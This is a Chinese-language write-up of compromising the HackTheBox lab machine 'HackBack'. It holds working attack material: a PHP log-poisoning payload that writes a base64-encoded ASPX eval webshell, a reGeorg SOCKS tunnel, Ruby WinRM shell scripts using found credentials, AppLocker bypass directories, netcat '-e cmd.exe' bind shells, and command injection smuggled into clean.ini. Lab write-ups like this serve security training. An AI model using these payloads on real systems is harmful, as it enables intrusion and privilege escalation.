HackTheBox HackBack渗透笔记

阅读量    83285 | 评论 1   稿费 350

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

本文为渗透hackback靶机过程,前前后后做了5天,中间踩了不少坑,也学到不少姿势,特此记录一下整个过程。本题难度等级为Insane,涉及文件包含,socks代理突破防火墙,winRm利用,applocker bypass,服务提权及NTFS文件流。

 

端口扫描

root@kali:~# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.128 --rate=1000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2019-07-15 04:36:32 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 64831/tcp on 10.10.10.128
Discovered open port 80/tcp on 10.10.10.128
Discovered open port 6666/tcp on 10.10.10.128
root@kali:~# nmap -sS -sV -sC -p80,6666,64831 10.10.10.128
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 00:40 EDT
Nmap scan report for 10.10.10.128
Host is up (0.27s latency).

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
6666/tcp  open  http        Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
64831/tcp open  ssl/unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain; charset=utf-8
|     Set-Cookie: _gorilla_csrf=MTU2MzE5MDkzNXxJbU0xYlRoVVYxRlJiVmhtZVZBclRGWllNWEpTY1dReVR6WkZNMlJOUlRJelVrSkplblJGVlhKMlVrazlJZ289fLpjZh1TEkaOHn_lIauQPG4cjZ6sYlWUjyFDBMtXNgdD; HttpOnly; Secure
|     Vary: Accept-Encoding
|     Vary: Cookie
|     X-Content-Type-Options: nosniff
|     Date: Mon, 15 Jul 2019 11:42:15 GMT
|     Content-Length: 19
|     page not found
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /login?next=%2F
|     Set-Cookie: _gorilla_csrf=MTU2MzE5MDkwMHxJalZOT0c4MU0zbEJPVmhsVDI1MlRrSTVWM3BJTlhoQlRHdzNSa2hUZEcxc2FFMUtMMDVpVVVocWMxRTlJZ289fCCWbHBsW-9n90ew27ro5Jb1zXiF11Mr1BFa192sGwFS; HttpOnly; Secure
|     Vary: Accept-Encoding
|     Vary: Cookie
|     Date: Mon, 15 Jul 2019 11:41:40 GMT
|     Content-Length: 38
|     href="/login?next=%2F">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 302 Found
|     Location: /login?next=%2F
|     Set-Cookie: _gorilla_csrf=MTU2MzE5MDkwMXxJa2xXYzBKRFNXVldkVmREWVhCMGQwaENVMnR5Y1hkbGFXMUVUV2xQVkVWcFVuRmhSa1JZTlZoWGIxazlJZ289fBJLWgwlhy38UywqLpChhdvUJMj7hSKnUM1KHFeN8MeO; HttpOnly; Secure
|     Vary: Accept-Encoding
|     Vary: Cookie
|     Date: Mon, 15 Jul 2019 11:41:41 GMT
|_    Content-Length: 0
| ssl-cert: Subject: organizationName=Gophish
| Not valid before: 2018-11-22T03:49:52
|_Not valid after:  2028-11-19T03:49:52

 

6666端口

修改hosts后用浏览器访问,但是没有回显,发现用curl可以

root@kali:~/pentest# curl http://hackback.htb:6666/
"Missing Command!"
root@kali:~/pentest# curl http://hackback.htb:6666/help
"hello,proc,whoami,list,info,services,netsat,ipconfig"

这里提供一些命令可以查看主机状态,在cmd.exe受限情况下,可以获得一些信息。

root@kali:~/pentest# curl http://hackback.htb:6666/info
{
    "WindowsBuildLabEx":  "17763.1.amd64fre.rs5_release.180914-1434",
    "WindowsCurrentVersion":  "6.3",
    "WindowsEditionId":  "ServerStandard",
    "WindowsInstallationType":  "Server",
    "WindowsInstallDateFromRegistry":  "/Date(1542436874000)/",
    "WindowsProductId":  "00429-00520-27817-AA520",
    "WindowsProductName":  "Windows Server 2019 Standard",
    "WindowsRegisteredOrganization":  "",
    "WindowsRegisteredOwner":  "Windows User",
    "WindowsSystemRoot":  "C:\Windows",
    "WindowsVersion":  "1809",
    "BiosCharacteristics":  null,
...

 

GoPhish

Gophish 是一个功能强大的开源网络钓鱼框架,可以轻松测试组织的网络钓鱼风险,专为企业和渗透测试人员设计

访问https://10.10.10.128:64831,可以用默认账号admin:gophish登陆

Email Templates可以找到一些钓鱼域名,将找到的域名都加入hosts文件中

 

js混淆

进入http://admin.hackback.htb/,尝试密码爆破无果,在网页源码中发现加载js的注释,考虑可能是js验证

使用gobuster进行目录扫描

root@kali:~/pentest# ./gobuster dir -u http://admin.hackback.htb/js/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -e -t 20 -x .js
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://admin.hackback.htb/js/
[+] Threads:        20
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     js
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2019/07/15 03:09:05 Starting gobuster
===============================================================
http://admin.hackback.htb/js/private.js (Status: 200)

获取到一个js,根据观察,应该进行了ROT13

<script>
    ine n=['k57k78k49k6nk77k72k37k44k75k73k4sk38k47k73k4ok76k52k77k42k2ok77k71k33k44k75k4qk4ok72k77k72k4pk44k67k63k4sk69k77k72k59k31k4ok45k45k67k47k38k4ok43k77k71k37k44k6pk38k4ok33','k41k63k4sk4qk77k71k76k44k71k51k67k43k77k34k2sk43k74k32k6rk44k74k4qk4ok68k5nk63k4ok44k77k71k54k43k70k54k73k79k77k37k6rk43k68k73k4sk51k58k4qk4sk35k57k38k4ok70k44k73k4sk74k4rk43k44k44k76k41k6nk43k67k79k6ok3q','k77k35k48k44k72k38k4sk37k64k44k52k6qk4qk4qk4ok4nk77k34k6nk44k6pk56k52k6rk77k72k74k37k77k37k73k30k77k6sk31k61k77k37k73k41k51k73k4ok73k66k73k4sk45k77k34k58k44k73k52k6nk43k6pk4qk4sk77k46k7nk72k43k6qk7nk70k76k43k41k6nk43k75k42k7nk44k73k73k4ok39k46k38k4sk34k77k71k5nk6rk57k73k4ok68'];(shapgvba(p,q){ine r=shapgvba(s){juvyr(--s){p['chfu'](p['fuvsg']());}};r(++q);}(n,0k66));ine o=shapgvba(p,q){p=p-0k0;ine r=n[p];vs(o['ZfHYzi']===haqrsvarq){(shapgvba(){ine s;gel{ine t=Shapgvba('ergheak20(shapgvba()k20'+'{}.pbafgehpgbe(k22ergheak20guvfk22)(k20)'+');');s=t();}pngpu(u){s=jvaqbj;}ine v='NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/=';s['ngbo']||(s['ngbo']=shapgvba(w){ine x=Fgevat(w)['ercynpr'](/=+$/,'');sbe(ine y=0k0,z,a,b=0k0,c='';a=x['puneNg'](b++);~a&&(z=y%0k4?z*0k40+a:a,y++%0k4)?c+=Fgevat['sebzPunePbqr'](0kss&z>>(-0k2*y&0k6)):0k0){a=v['vaqrkBs'](a);}erghea c;});}());ine d=shapgvba(e,q){ine g=[],h=0k0,i,j='',k='';e=ngbo(e);sbe(ine l=0k0,m=e['yratgu'];l<m;l++){k+='%'+('00'+e['punePbqrNg'](l)['gbFgevat'](0k10))['fyvpr'](-0k2);}e=qrpbqrHEVPbzcbarag(k);sbe(ine N=0k0;N<0k100;N++){g[N]=N;}sbe(N=0k0;N<0k100;N++){h=(h+g[N]+q['punePbqrNg'](N%q['yratgu']))%0k100;i=g[N];g[N]=g[h];g[h]=i;}N=0k0;h=0k0;sbe(ine O=0k0;O<e['yratgu'];O++){N=(N+0k1)%0k100;h=(h+g[N])%0k100;i=g[N];g[N]=g[h];g[h]=i;j+=Fgevat['sebzPunePbqr'](e['punePbqrNg'](O)^g[(g[N]+g[h])%0k100]);}erghea j;};o['BbNPpq']=d;o['dFYjTx']={};o['ZfHYzi']=!![];}ine P=o['dFYjTx'][p];vs(P===haqrsvarq){vs(o['cVwyDO']===haqrsvarq){o['cVwyDO']=!![];}r=o['BbNPpq'](r,q);o['dFYjTx'][p]=r;}ryfr{r=P;}erghea r;};ine k='k53k65k63k75k72k65k20k4pk6sk67k69k6rk20k42k79k70k61k73k73';ine m=o('0k0','k50k5qk53k36');ine u=o('0k1','k72k37k54k59');ine l=o('0k2','k44k41k71k67');ine g='k3sk61k63k74k69k6sk6rk3qk28k73k68k6sk77k2pk6pk69k73k74k2pk65k78k65k63k2pk69k6rk69k74k29';ine f='k26k73k69k74k65k3qk28k74k77k69k74k74k65k72k2pk70k61k79k70k61k6pk2pk66k61k63k65k62k6sk6sk6ok2pk68k61k63k6ok74k68k65k62k6sk78k29';ine v='k26k70k61k73k73k77k6sk72k64k3qk2nk2nk2nk2nk2nk2nk2nk2n';ine x='k26k73k65k73k73k69k6sk6rk3q';ine j='k4rk6sk74k68k69k6rk67k20k6qk6sk72k65k20k74k6sk20k73k61k79';
</script>

ROT13后丢到浏览器运行,并查看结果:

得到隐藏目录http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/,直接访问会跳回主页,下面使用wfuzz进行扫描(教程:https://www.secpulse.com/archives/81560.html)

root@kali:~/pentest# wfuzz -w /usr/share/wfuzz/wordlist/general/admin-panels.txt --hc 404 -t 20 http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/FUZZ
Total requests: 137

==================================================================
ID      Response   Lines      Word         Chars          Payload
==================================================================

000086:  C=302      0 L        0 W            0 Ch        "webadmin.php"

Total time: 2.268253
Processed Requests: 137
Filtered Requests: 136
Requests/sec.: 60.39890

其实用什么工具不是问题,主要是字典,gobuster也能找到

./gobuster dir -u http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/ -w /usr/share/wfuzz/wordlist/general/admin-panels.txt -e -t 20

访问http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php依然跳回主页,重新看一下之前js的其他变量

添加url参数后尝试访问

root@kali:/usr/share/seclists# curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=123456&session='
Wrong secret key!

使用wfuzz进行密码爆破,成功爆出密码为12345678

root@kali:~/pentest# wfuzz -u 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=FUZZ&session=' -w /usr/share/seclists/Passwords/darkweb2017-top100.txt --hw 3

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=FUZZ&session=
Total requests: 99

==================================================================
ID      Response   Lines      Word         Chars          Payload
==================================================================

000007:  C=302      7 L       15 W          197 Ch        "12345678"

Total time: 3.099911
Processed Requests: 99
Filtered Requests: 98
Requests/sec.: 31.93639

修改密码后进行访问,可能是访问钓鱼网站 www.hackthebox.htb 的日志

root@kali:~/pentest# curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=list&site=hackthebox&password=12345678&session='
Array
(
    [0] => .
    [1] => ..
    [2] => 9601dd184a3042af3dcf64e75775e40f9bc1502d7da75ca118a1e5d0021dcb69.log
    [3] => e691d0d9c19785cf4c5ab50375c10d83130f175f7f89ebd1899eee6a7aab0dd7.log
)

访问一下 www.hackthebox.htb 并登陆(要加hosts)后再list,可以发现我们的登陆日志新增了

使用show,并且加上自己的session,可以显示登陆日志

root@kali:~/pentest# curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=4168c22b949fb7d4327f254fb5f7344efe220bc9d6ac5f4fd1ce44f86ac7fb0a' -b "PHPSESSID=4168c22b949fb7d4327f254fb5f7344efe220bc9d6ac5f4fd1ce44f86ac7fb0a"
[16 July 2019, 03:22:06 AM] 10.10.14.13 - Username: admin, Password: 123456

 

日志包含

那么可以尝试在用户名密码处写入php代码,然后包含它

然而发现phpinfo并没有回显,用户名处变成空白,至少证明php代码生效了,可能函数被ban了

root@kali:~/pentest# curl 'http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/webadmin.php?action=show&site=hackthebox&password=12345678&session=4168c22b949fb7d4327f254fb5f7344efe220bc9d6ac5f4fd1ce44f86ac7fb0a' -b "PHPSESSID=4168c22b949fb7d4327f254fb5f7344efe220bc9d6ac5f4fd1ce44f86ac7fb01"
[16 July 2019, 05:48:27 AM] 10.10.14.13 - Username: , Password: 123456

测试发现scandir()getcwd()file_get_contents()file_put_contents()是可以使用的,system()之类的命令执行都不能用,留意到http的响应包头,网站还支持asp.net

X-Powered-By: PHP/7.2.7
X-Powered-By: ASP.NET

使用以下代码作用户名登陆一次,然后再次包含日志文件写入一个asp小马

<?php file_put_contents("shell.aspx",base64_decode("PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiJT4KPCUgZXZhbChSZXF1ZXN0Lkl0ZW1bImFudCJdLCJ1bnNhZmUiKTsgJT4=")); ?>

使用菜刀链接http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/shell.aspx,可以查看目录但是,执行命令全部返回ERROR:// Access is denied,在fuzzdb下载一个命令执行的马( cmd.aspx),用小马上传。

直接运行cmd.exe权限不够会报错,但是可以运行netstat之类的命令,这里其实用之前6666端口的命令执行也行。

留意到有3389(远程桌面),5985(winRM),但是扫描的时候都没发现,怀疑开了防火墙,检查一下防火墙配置。

 

突破防火墙

由于开了防火墙,只有部分端口开放了,这里使用ReGeorg建一个socks通道。上传tunnel.aspx,执行以下命令

root@kali:~/pentest/reGeorg# python reGeorgSocksProxy.py -p 23333 -u http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/tunnel.aspx


                     _____
  _____   ______  __|___  |__  ______  _____  _____   ______
 |     | |   ___||   ___|    ||   ___|/     |     | |   ___|
 |      |   ___||   |  |    ||   ___||     ||      |   |  |
 |__|__|______||______|  __||______|_____/|__|__|______|
                    |_____|
                    ... every office needs a tool like Georg

  willem@sensepost.com / @_w_m__
  sam@sensepost.com / @trowalts
  etienne@sensepost.com / @kamp_staaldraad


[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:23333], tunnel at [http://admin.hackback.htb/2bb6916122f1da34dcd916421e531578/tunnel.aspx]
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg says, 'All seems fine'

修改/etc/proxychains.conf,增加一行配置

socks4    127.0.0.1 23333

 

winRM

Windows 远程管理 (WinRM) 是 WS-Management 协议的 Microsoft 实现。该协议是基于简单对象访问协议 (SOAP) 的、防火墙友好的标准协议,使来自不同供应商的硬件和操作系统能够互操作。WS-Management 协议由硬件和软件制造商群体开发,作为一种公共标准,可用于与实现该协议的任何计算机设备远程交换管理数据。

使用菜刀浏览web目录,可以发现一个备份文件web.config.old,里面保存了账号密码

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <authentication mode="Windows">
        <identity impersonate="true"                 
            userName="simple" 
            password="ZonoProprioZomaro:-("/>
     </authentication>
        <directoryBrowse enabled="false" showFlags="None" />
    </system.webServer>
</configuration>
  • 使用pywinrm库编写脚本(有问题)
  • 使用WinRM进行编写脚本,参考脚本
#!/usr/bin/ruby
require 'winrm'

conn = WinRM::Connection.new( 
  endpoint: 'http://10.10.10.128:5985/wsman',
  transport: :ssl,
  user: 'simple',
  password: 'ZonoProprioZomaro:-(',
  :no_ssl_peer_verification => true
)

command=""
conn.shell(:powershell) do |shell|
    until command == "exitn" do
        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
        print(output.output.chomp)
        command = STDIN.gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end    
    puts "Exiting with code #{output.exitcode}"
end

带上传功能的脚本winrm_shell_with_upload.rb

require 'winrm-fs'

# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:tempmyfile.txt

conn = WinRM::Connection.new( 
  endpoint: 'http://10.10.10.128:5985/wsman',
  transport: :ssl,
  user: 'simple',
  password: 'ZonoProprioZomaro:-(',
  :no_ssl_peer_verification => true
)

file_manager = WinRM::FS::FileManager.new(conn) 

class String
  def tokenize
    self.
      split(/s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
      select {|s| not s.empty? }.
      map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
  end
end


command=""

conn.shell(:powershell) do |shell|
    until command == "exitn" do
        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
        print(output.output.chomp)
        command = gets
        if command.start_with?('UPLOAD') then
            upload_command = command.tokenize
            print("Uploading " + upload_command[1] + " to " + upload_command[2])
            file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
                puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
            end
            command = "echo `nOK`n"
        end

        output = shell.run(command) do |stdout, stderr|
            STDOUT.print(stdout)
            STDERR.print(stderr)
        end
    end    
    puts("Exiting with code #{output.exitcode}")
end

成功登陆为simple用户,但是桌面并没有flag

root@kali:~/pentest# proxychains ruby winrm.rb
ProxyChains-3.1 (http://proxychains.sf.net)
ruby: warning: shebang line ending with r may cause problems

PS hackbacksimple@HACKBACK Documents> whoami
hackbacksimple

之前用菜刀翻目录时,发现一个可疑的文件,其中script文件夹没权限打开

尝试使用simple用户访问,发现有一堆脚本

PS hackbacksimple@HACKBACK > dir -force c:utilscripts
    Directory: C:utilscripts
Mode                LastWriteTime         Length Name                                                                                                                                   
----                -------------         ------ ----                                                                                                                                   
d-----       12/13/2018   2:54 PM                spool                                                                                                                                  
-a----       12/21/2018   5:44 AM             84 backup.bat                                                                                                                             
-a----        7/16/2019   9:04 AM            402 batch.log                                                                                                                              
-a----       12/13/2018   2:56 PM             93 clean.ini                                                                                                                              
-a-h--       12/13/2018   2:58 PM            330 dellog.bat                                                                                                                             
-a----        12/8/2018   9:17 AM           1232 dellog.ps1                                                                                                                             
-a----        7/16/2019   9:04 AM             35 log.txt

用脚本交互不太方便,考虑上传一个nc.exe开一个shell,使用带上传功能的脚本进行上传。

root@kali:~/pentest# proxychains ruby winrm-upload.rb
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:23333-<><>-10.10.10.128:5985-<><>-OK
PS hackbacksimple@HACKBACK Documents> UPLOAD /root/pentest/nc.exe nc.exe

26932 bytes of 40960 bytes copied
40960 bytes of 40960 bytes copied

PS hackbacksimple@HACKBACK Documents> .nc.exe -e cmd.exe -lvp 23334
Program 'nc.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
+ .nc.exe -e cmd.exe -lvp 23334
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .nc.exe -e cmd.exe -lvp 23334
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

 

bypass applocker

上传nc后,发现无法运行,系统有applocker,绕过方法参考Generic-AppLockerbypasses,常见的目录如下

C:WindowsTasks 
C:WindowsTemp 
C:windowstracing
C:WindowsRegistrationCRMLog
C:WindowsSystem32FxsTmp
C:WindowsSystem32comdmp
C:WindowsSystem32MicrosoftCryptoRSAMachineKeys
C:WindowsSystem32spoolPRINTERS
C:WindowsSystem32spoolSERVERS
C:WindowsSystem32spooldriverscolor   
C:WindowsSystem32TasksMicrosoftWindowsSyncCenter
C:WindowsSysWOW64FxsTmp
C:WindowsSysWOW64comdmp
C:WindowsSysWOW64TasksMicrosoftWindowsSyncCenter
C:WindowsSysWOW64TasksMicrosoftWindowsPLASystem

重新上传nc到C:WindowsSystem32spooldriverscolor,监听端口23334

PS hackbacksimple@HACKBACK Documents> UPLOAD /root/pentest/nc.exe C:WindowsSystem32spooldriverscolornc.exe
PS hackbacksimple@HACKBACK Documents> C:WindowsSystem32spooldriverscolornc.exe -e cmd.exe -lp 23334

 

命令注入

nc连接过去后,继续检查c:utilscripts的文件

c:utilscripts>type clean.ini
type clean.ini
[Main]
LifeTime=100
LogFile=c:utilscriptslog.txt
Directory=c:inetpublogslogfiles

c:utilscripts>type dellog.ps1
Access is denied.

c:utilscripts>type dellog.bat
@echo off
rem =scheduled=
echo %DATE% %TIME% start bat >c:utilscriptsbatch.log
powershell.exe -exec bypass -f c:utilscriptsdellog.ps1 >> c:utilscriptsbatch.log
for /F "usebackq" %%i in (`dir /b C:utilscriptsspool*.bat`) DO (
start /min C:utilscriptsspool%%i
timeout /T 5
del /q C:utilscriptsspool%%i
)

我们没有权限查看dellog.ps1,而clean.ini当前用户有权限修改,ini文件在windows中一般作为记录参数,大胆猜测dellog.ps1执行时会把clean.ini中的内容作为参数执行,因此这里存在命令注入

[Main]
LifeTime=100
LogFile=c:utilscriptslog.txt & <命令注入位置>
Directory=c:inetpublogslogfiles

修改clean.ini,加入nc监听端口命令,注意clean.ini内容是宽字节的,需要在powershell下用echo写入

C:utilscripts>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:utilscripts> echo "[Main]`nLifeTime=100`nLogFile=c:utilscriptslog.txt & cmd.exe /c C:windowssystem32spooldriverscolornc.exe -lvp 23335 -e cmd.exe`nDirectory=c:inetpublogslogfiles" > c:utilscriptsclean.ini

等待定时任务执行后可以nc连接过去

root@kali:~/pentest# proxychains nc 127.0.0.1 23335
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:23333-<><>-127.0.0.1:23335-<><>-OK
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:Windowssystem32>whoami
whoami
hackbackhacker

C:Windowssystem32>type C:UsershackerDesktopuser.txt
type C:UsershackerDesktopuser.txt
92244xxxxxxxxxxxxd1e99cfe

 

服务提权

用之前6666端口查看系统开启的服务,其中有一个可疑的服务

root@kali:~/pentest# curl http://hackback.htb:6666/services
        "name":  "UserLogger",
        "startname":  "LocalSystem",
        "displayname":  "User Logger",
        "status":  "OK"

在hacker用户下测试,发现用户可以控制userlogger启动和暂停

C:UsershackerDesktop>sc query userlogger

SERVICE_NAME: userlogger
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:UsershackerDesktop>sc start userlogger C:UsershackerDesktoptest.txt

SERVICE_NAME: userlogger 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2876
        FLAGS              :

发现在同目录下生成了test.txt.log,并且权限为Everyone

C:UsershackerDesktop>type test.txt.log
Logfile specified!
Service is starting
Service is running

C:UsershackerDesktop>cacls C:UsershackerDesktoptest.txt.log
C:UsershackerDesktoptest.txt.log Everyone:F

下载c:windowssystem32UserLogger.exe,检查一下,发现有upx壳

upx脱壳后拖入IDA简单看一下,搜索关键字Service is starting,跟踪到函数sub_140001240

  OutputDebugStringW(L"My Sample Service: ServiceMain: Entry");
  v4 = (WCHAR *)&FileName;
  for ( i = 520i64; i; --i )
  {
    *v4 = 0;
    ++v4;
  }
  SetCurrentDirectoryA("c:\windows\temp");
  if ( v2 <= 1 )
  {
    dword_140016BC8 = 103;
    *(_OWORD *)&FileName = xmmword_140013338;
    qword_140016BC0 = 31244186274365541i64;
    xmmword_140016BB0 = xmmword_140013348;
    printf((__int64)L"No Logfile specified using default!n");
  }
  else
  {
    OutputDebugStringW(*(LPCWSTR *)(v3 + 8));
    if ( !sub_140002200(*(_QWORD *)(v3 + 8), L"c:\windows") && !sub_140002200(*(_QWORD *)(v3 + 8), L"\\") )
    {
      v6 = *(_WORD **)(v3 + 8);
      v7 = (signed __int64)(v6 + 1);
      if ( *v6 != 47 )
        v7 = *(_QWORD *)(v3 + 8);
      sub_140003348(&FileName, 260i64, v7);
      sub_1400033B0(&FileName, 260i64, (__int64)L".log");
      printf((__int64)L"Logfile specified!n");
      OutputDebugStringW(&FileName);
    }
  }
  printf((__int64)L"Service is startingn");
  v8 = RegisterServiceCtrlHandlerW(L"UserLogger", HandlerProc);

这个服务可以将输入路径的最后一个文件名拼接上.log,同时修改文件的权限。这里需要使用一个windows的trick,windows的文件名不接受:,可以在文件名最后加上:进行截断。

PS C:UsershackerDesktop> sc.exe start userlogger "C:UsersAdministratorDesktoproot.txt:"

SERVICE_NAME: userlogger
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 4804
        FLAGS              :

此时root.txt的权限变为Everyone,然而打开是一头驴

PS C:UsershackerDesktop> cat C:UsersAdministratorDesktoproot.txt

                                __...----..
                             .-'           `-.
                            /        .---.._  
                            |        |      |
                             `.      |    | | |        _____
                               `     '    | | /    _.-`      `.
                                    |  .'| //'''.'            
                                 `---'_(`.||.`.`.'    _.`.'''-. 
                                    _(`'.    `.`.`'.-'  \      
                                   (' .'   `-._.- /      \      |
                                  ('./   `-._   .-|       \     ||
                                  ('. | | 0') ('0 __.--.  `----'/
                             _.--('..|   `--    .'  .-.  `. `--..'
               _..--..._ _.-'    ('.:|      .  /   ` 0 `   
            .'         .-'        `..'  |  / .^.           |
           /         .'                  '  .             `._
        .'|                              `.  `...____.----._.'
      .'.'|         .                       |    |_||_||__|
     //            |                  _.-'| |_ `.   
     ||   |         |                     / _| _  _ |
     ||   |         /.     .              ' `.`.| || ||
     ||   /        ' '     |        .     |   `.`---'/
   .' `.  |       .' .'`.        .'     /      `...'
 .'           .'.'     `---    '.-'   |
)/ / /)/ .|                 `.   `.   
 )/ (   /     |                  | `.  `-.
  )/     )   |  |             __    .-`    
         |  /|  )  .-.      //' `-|     _   /
        / _| |  `-'.-.     ||    `.   )_.--'
        )   '-.  /  '|     ''.__.-`  |
       /  `-  '._|--'                 `.
           _                       /    `---.
       /.--`                            .''''
       `._..._|                       `-.'  .-. |
                                        '_.'-./.'

 

ntfs文件流

对于CTF选手,很容想到是隐写,将root.txt复制到hacker的桌面,输入命令检查一下发现果然是ntfs流隐写。

PS C:UsershackerDesktop> sc.exe start userlogger "C:UsersAdministrator:"

PS C:UsershackerDesktop> Copy-Item "C:UsersAdministratorDesktoproot.txt" .

PS C:UsershackerDesktop> Get-Item root.txt -force -stream *

PSPath        : Microsoft.PowerShell.CoreFileSystem::C:UsershackerDesktoproot.txt::$DATA
PSParentPath  : Microsoft.PowerShell.CoreFileSystem::C:UsershackerDesktop
PSChildName   : root.txt::$DATA
PSDrive       : C
PSProvider    : Microsoft.PowerShell.CoreFileSystem
PSIsContainer : False
FileName      : C:UsershackerDesktoproot.txt
Stream        : :$DATA
Length        : 1958

PSPath        : Microsoft.PowerShell.CoreFileSystem::C:UsershackerDesktoproot.txt:.log
PSParentPath  : Microsoft.PowerShell.CoreFileSystem::C:UsershackerDesktop
PSChildName   : root.txt:.log
PSDrive       : C
PSProvider    : Microsoft.PowerShell.CoreFileSystem
PSIsContainer : False
FileName      : C:UsershackerDesktoproot.txt
Stream        : .log
Length        : 58

PSPath        : Microsoft.PowerShell.CoreFileSystem::C:UsershackerDesktoproot.txt:flag.txt
PSParentPath  : Microsoft.PowerShell.CoreFileSystem::C:UsershackerDesktop
PSChildName   : root.txt:flag.txt
PSDrive       : C
PSProvider    : Microsoft.PowerShell.CoreFileSystem
PSIsContainer : False
FileName      : C:UsershackerDesktoproot.txt
Stream        : flag.txt
Length        : 35

PS C:UsershackerDesktop> Get-Content -force -path root.txt -stream flag.txt
6d29bxxxxxxxxxxxxxxx7d02515
分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多